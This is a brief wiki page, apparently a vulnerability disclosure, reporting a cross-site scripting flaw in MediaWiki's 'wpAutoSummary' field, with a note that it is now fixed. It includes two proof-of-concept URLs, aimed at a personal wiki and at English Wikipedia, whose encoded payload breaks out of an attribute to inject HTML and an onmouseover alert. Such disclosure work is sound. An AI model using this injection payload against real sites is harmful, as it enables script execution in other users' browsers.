MediaWiki/Parser43

From Nick Jenkins

Jump to: navigation, search

XSS Arbitrary JavaScript execution and HTML insertion.

The problem is the "wpAutoSummary" field.

Proof-of-Concept, on my personal wiki: http://get-to-post.nickj.org/?http://nickj.org/index.php?title=Talk:MediaWiki/Parser43&action=edit&wpTextbox1=Try+moving+cursor+over+red+text+at+bottom+of+page+for+popup&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a

Proof-of-Concept, on the English Wikipedia: http://get-to-post.nickj.org/?http://en.wikipedia.org/wiki/index.php?title=TESTTEST&action=edit&wpTextbox1=test&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a (will need to scroll down page to see). (Note: this is now fixed).

Retrieved from "http://nickj.org/index.php?title=MediaWiki/Parser43&oldid=2133"